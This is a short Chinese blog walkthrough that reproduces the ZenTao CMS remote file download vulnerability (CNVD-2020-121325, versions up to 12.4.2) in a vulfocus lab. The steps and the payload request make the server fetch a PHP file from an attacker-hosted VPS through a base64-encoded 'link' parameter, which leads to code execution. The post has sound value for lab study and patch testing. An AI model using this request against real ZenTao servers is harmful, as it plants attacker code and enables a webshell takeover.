禅道cnvd_2020_121325

背景:
禅道项目管理软件是国产的开源项目管理软件。 禅道CMS<=12.4.2版本存在文件上传漏洞,该漏洞由于开发者对link参数过滤不严,导致攻击者对下载链接可控,导致可远程下载服务器恶意脚本文件,造成任意代码执行,获取webshell。

漏洞编号:
cnvd_2020_121325

影响版本:
<=12.4.2

环境搭建:
1,启动vulfocus环境

2,构造后台登录页面(URL/zentaopms/www)

3,输入用户名密码,并对当前页面进行抓包

4,在vps开启http服务

5,在/var/www/html/下创建一个phpinfo内容的文件

6,将文件的URL进行base64编码(对HTTP头使用大写)

7,构造payload数据包
/zentaopms/www/index.php?m=client&f=download&version=1&link=SFRUUDovLzM5Ljk2LjM5LjEXXXXXXXN0LnBocA==

8,发送数据包

9,访问http://vulfocus.fofa.so:38325/zentaopms/www/data/client/1/test.php,phpinfo地址

posted @ 2022-01-10 15:28  Colin.B  阅读(661)  评论(0编辑  收藏  举报